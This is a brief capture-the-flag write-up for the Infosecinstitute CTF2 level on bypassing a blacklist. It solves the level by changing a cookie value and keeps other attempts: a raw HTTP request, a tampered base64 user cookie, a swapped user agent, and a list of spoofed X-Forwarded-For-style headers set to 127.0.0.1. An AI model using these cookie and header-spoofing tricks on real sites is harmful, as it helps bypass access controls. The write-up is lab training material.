Infosecinstitute | CTF2

Level 11 | Bypassing blacklists

It seems you have been blacklisted. Knowing what websites typically use to identify their users - try to get rid of that ban.

Target:

Tools:

  • Firefox
  • FireBug

It's seems because I'm blocked, the page forwards me after few seconds to the next level.

Damn it! I've solved this silly one and I didn't relied Ok, it's simple step ,, change the **welcome** cookie from no to yes and refresh the page. That's it



Note I'm leaving the below wrong steps because it's really helpfull in such situations but not in this silly case




GET /ctf2/exercises/ex11.php HTTP/1.1
Host: ctf.infosecinstitute.com
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:38.0) Gecko/20100101 Firefox/38.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: welcome=yes; PHPSESSID=nmg9vid2fite44g1vgqtmgmoq5; user=Sk9ITitET0U%3D
Connection: keep-alive
Decode JOHN+DOE which is JOHN+DOE change it to be TWFyeStKYW5l which is Mary+Jane

from hint, I changed the user agent, found a list here (http://www.useragentstring.com/pages/useragentstring.php) to

Mozilla/5.0 (Windows; U; MSIE 9.0; WIndows NT 9.0; en-US))
X-forwarded-for: 127.0.0.1
X-Forwarded-Host: 127.0.0.1
X-originating-IP: 127.0.0.1
x-remote-addr: 127.0.0.1
X-remote-IP: 127.0.0.1
X-Real-IP: 127.0.0.1

Done!